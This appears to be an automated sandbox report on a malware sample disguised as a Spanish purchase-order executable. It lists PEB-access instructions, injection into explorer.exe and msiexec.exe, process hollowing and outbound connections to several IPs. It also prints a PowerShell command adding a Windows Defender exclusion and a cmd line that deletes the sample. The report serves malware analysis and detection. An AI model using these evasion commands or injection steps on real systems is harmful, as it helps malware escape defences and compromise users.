Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016609AD mov eax, dword ptr fs:[00000030h]	6_2_016609AD
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E89B3 mov esi, dword ptr fs:[00000030h]	6_2_016E89B3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E89B3 mov eax, dword ptr fs:[00000030h]	6_2_016E89B3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E89B3 mov eax, dword ptr fs:[00000030h]	6_2_016E89B3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EE872 mov eax, dword ptr fs:[00000030h]	6_2_016EE872
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EE872 mov eax, dword ptr fs:[00000030h]	6_2_016EE872
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F6870 mov eax, dword ptr fs:[00000030h]	6_2_016F6870
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F6870 mov eax, dword ptr fs:[00000030h]	6_2_016F6870
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01672840 mov ecx, dword ptr fs:[00000030h]	6_2_01672840
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01690854 mov eax, dword ptr fs:[00000030h]	6_2_01690854
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01664859 mov eax, dword ptr fs:[00000030h]	6_2_01664859
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01664859 mov eax, dword ptr fs:[00000030h]	6_2_01664859
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170483A mov eax, dword ptr fs:[00000030h]	6_2_0170483A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170483A mov eax, dword ptr fs:[00000030h]	6_2_0170483A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A830 mov eax, dword ptr fs:[00000030h]	6_2_0169A830
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01682835 mov eax, dword ptr fs:[00000030h]	6_2_01682835
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01682835 mov eax, dword ptr fs:[00000030h]	6_2_01682835
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01682835 mov eax, dword ptr fs:[00000030h]	6_2_01682835
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01682835 mov ecx, dword ptr fs:[00000030h]	6_2_01682835
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01682835 mov eax, dword ptr fs:[00000030h]	6_2_01682835
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01682835 mov eax, dword ptr fs:[00000030h]	6_2_01682835
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EC810 mov eax, dword ptr fs:[00000030h]	6_2_016EC810
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169C8F9 mov eax, dword ptr fs:[00000030h]	6_2_0169C8F9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169C8F9 mov eax, dword ptr fs:[00000030h]	6_2_0169C8F9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172A8E4 mov eax, dword ptr fs:[00000030h]	6_2_0172A8E4
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E8C0 mov eax, dword ptr fs:[00000030h]	6_2_0168E8C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660887 mov eax, dword ptr fs:[00000030h]	6_2_01660887
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EC89D mov eax, dword ptr fs:[00000030h]	6_2_016EC89D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165CB7E mov eax, dword ptr fs:[00000030h]	6_2_0165CB7E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170EB50 mov eax, dword ptr fs:[00000030h]	6_2_0170EB50
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F6B40 mov eax, dword ptr fs:[00000030h]	6_2_016F6B40
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F6B40 mov eax, dword ptr fs:[00000030h]	6_2_016F6B40
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172AB40 mov eax, dword ptr fs:[00000030h]	6_2_0172AB40
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01708B42 mov eax, dword ptr fs:[00000030h]	6_2_01708B42
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01714B4B mov eax, dword ptr fs:[00000030h]	6_2_01714B4B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01714B4B mov eax, dword ptr fs:[00000030h]	6_2_01714B4B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168EB20 mov eax, dword ptr fs:[00000030h]	6_2_0168EB20
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168EB20 mov eax, dword ptr fs:[00000030h]	6_2_0168EB20
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01728B28 mov eax, dword ptr fs:[00000030h]	6_2_01728B28
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01728B28 mov eax, dword ptr fs:[00000030h]	6_2_01728B28
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DEB1D mov eax, dword ptr fs:[00000030h]	6_2_016DEB1D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DEB1D mov eax, dword ptr fs:[00000030h]	6_2_016DEB1D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DEB1D mov eax, dword ptr fs:[00000030h]	6_2_016DEB1D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DEB1D mov eax, dword ptr fs:[00000030h]	6_2_016DEB1D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DEB1D mov eax, dword ptr fs:[00000030h]	6_2_016DEB1D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DEB1D mov eax, dword ptr fs:[00000030h]	6_2_016DEB1D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DEB1D mov eax, dword ptr fs:[00000030h]	6_2_016DEB1D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DEB1D mov eax, dword ptr fs:[00000030h]	6_2_016DEB1D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DEB1D mov eax, dword ptr fs:[00000030h]	6_2_016DEB1D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168EBFC mov eax, dword ptr fs:[00000030h]	6_2_0168EBFC
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668BF0 mov eax, dword ptr fs:[00000030h]	6_2_01668BF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668BF0 mov eax, dword ptr fs:[00000030h]	6_2_01668BF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668BF0 mov eax, dword ptr fs:[00000030h]	6_2_01668BF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016ECBF0 mov eax, dword ptr fs:[00000030h]	6_2_016ECBF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170EBD0 mov eax, dword ptr fs:[00000030h]	6_2_0170EBD0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01680BCB mov eax, dword ptr fs:[00000030h]	6_2_01680BCB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01680BCB mov eax, dword ptr fs:[00000030h]	6_2_01680BCB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01680BCB mov eax, dword ptr fs:[00000030h]	6_2_01680BCB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660BCD mov eax, dword ptr fs:[00000030h]	6_2_01660BCD
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660BCD mov eax, dword ptr fs:[00000030h]	6_2_01660BCD
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660BCD mov eax, dword ptr fs:[00000030h]	6_2_01660BCD
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01714BB0 mov eax, dword ptr fs:[00000030h]	6_2_01714BB0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01714BB0 mov eax, dword ptr fs:[00000030h]	6_2_01714BB0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670BBE mov eax, dword ptr fs:[00000030h]	6_2_01670BBE
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670BBE mov eax, dword ptr fs:[00000030h]	6_2_01670BBE
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169CA6F mov eax, dword ptr fs:[00000030h]	6_2_0169CA6F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169CA6F mov eax, dword ptr fs:[00000030h]	6_2_0169CA6F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169CA6F mov eax, dword ptr fs:[00000030h]	6_2_0169CA6F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170EA60 mov eax, dword ptr fs:[00000030h]	6_2_0170EA60
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DCA72 mov eax, dword ptr fs:[00000030h]	6_2_016DCA72
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DCA72 mov eax, dword ptr fs:[00000030h]	6_2_016DCA72
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01666A50 mov eax, dword ptr fs:[00000030h]	6_2_01666A50
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01666A50 mov eax, dword ptr fs:[00000030h]	6_2_01666A50
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01666A50 mov eax, dword ptr fs:[00000030h]	6_2_01666A50
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01666A50 mov eax, dword ptr fs:[00000030h]	6_2_01666A50
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01666A50 mov eax, dword ptr fs:[00000030h]	6_2_01666A50
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01666A50 mov eax, dword ptr fs:[00000030h]	6_2_01666A50
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01666A50 mov eax, dword ptr fs:[00000030h]	6_2_01666A50
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670A5B mov eax, dword ptr fs:[00000030h]	6_2_01670A5B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670A5B mov eax, dword ptr fs:[00000030h]	6_2_01670A5B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168EA2E mov eax, dword ptr fs:[00000030h]	6_2_0168EA2E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169CA24 mov eax, dword ptr fs:[00000030h]	6_2_0169CA24
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169CA38 mov eax, dword ptr fs:[00000030h]	6_2_0169CA38
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01684A35 mov eax, dword ptr fs:[00000030h]	6_2_01684A35
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01684A35 mov eax, dword ptr fs:[00000030h]	6_2_01684A35
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016ECA11 mov eax, dword ptr fs:[00000030h]	6_2_016ECA11
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169AAEE mov eax, dword ptr fs:[00000030h]	6_2_0169AAEE
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169AAEE mov eax, dword ptr fs:[00000030h]	6_2_0169AAEE
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016B6ACC mov eax, dword ptr fs:[00000030h]	6_2_016B6ACC
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016B6ACC mov eax, dword ptr fs:[00000030h]	6_2_016B6ACC
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016B6ACC mov eax, dword ptr fs:[00000030h]	6_2_016B6ACC
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660AD0 mov eax, dword ptr fs:[00000030h]	6_2_01660AD0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01694AD0 mov eax, dword ptr fs:[00000030h]	6_2_01694AD0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01694AD0 mov eax, dword ptr fs:[00000030h]	6_2_01694AD0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668AA0 mov eax, dword ptr fs:[00000030h]	6_2_01668AA0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668AA0 mov eax, dword ptr fs:[00000030h]	6_2_01668AA0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016B6AA4 mov eax, dword ptr fs:[00000030h]	6_2_016B6AA4
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166EA80 mov eax, dword ptr fs:[00000030h]	6_2_0166EA80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166EA80 mov eax, dword ptr fs:[00000030h]	6_2_0166EA80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166EA80 mov eax, dword ptr fs:[00000030h]	6_2_0166EA80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166EA80 mov eax, dword ptr fs:[00000030h]	6_2_0166EA80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166EA80 mov eax, dword ptr fs:[00000030h]	6_2_0166EA80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166EA80 mov eax, dword ptr fs:[00000030h]	6_2_0166EA80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166EA80 mov eax, dword ptr fs:[00000030h]	6_2_0166EA80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166EA80 mov eax, dword ptr fs:[00000030h]	6_2_0166EA80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166EA80 mov eax, dword ptr fs:[00000030h]	6_2_0166EA80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01734A80 mov eax, dword ptr fs:[00000030h]	6_2_01734A80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01698A90 mov edx, dword ptr fs:[00000030h]	6_2_01698A90
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F8D6B mov eax, dword ptr fs:[00000030h]	6_2_016F8D6B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660D59 mov eax, dword ptr fs:[00000030h]	6_2_01660D59
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660D59 mov eax, dword ptr fs:[00000030h]	6_2_01660D59
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660D59 mov eax, dword ptr fs:[00000030h]	6_2_01660D59
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668D59 mov eax, dword ptr fs:[00000030h]	6_2_01668D59
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668D59 mov eax, dword ptr fs:[00000030h]	6_2_01668D59
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668D59 mov eax, dword ptr fs:[00000030h]	6_2_01668D59

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.213 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.104.233.69 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 18.167.179.176 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.12.188 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.96.23.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.130.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.228.106.35 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

Memory written: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Thread register set: target process: 4056			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread register set: target process: 4056			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: BD0000

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process created: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe"	Jump to behavior

Source: explorer.exe, 00000007.00000003.3076004811.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076156355.0000000009021000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2272035015.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.3785673759.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1396919562.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.3785673759.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1396919562.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 00000007.00000000.1394969393.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3782175629.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000007.00000002.3785673759.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1396919562.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Queries volume information: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.DataVisualization\v4.0_4.0.0.0__31bf3856ad364e35\System.Windows.Forms.DataVisualization.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
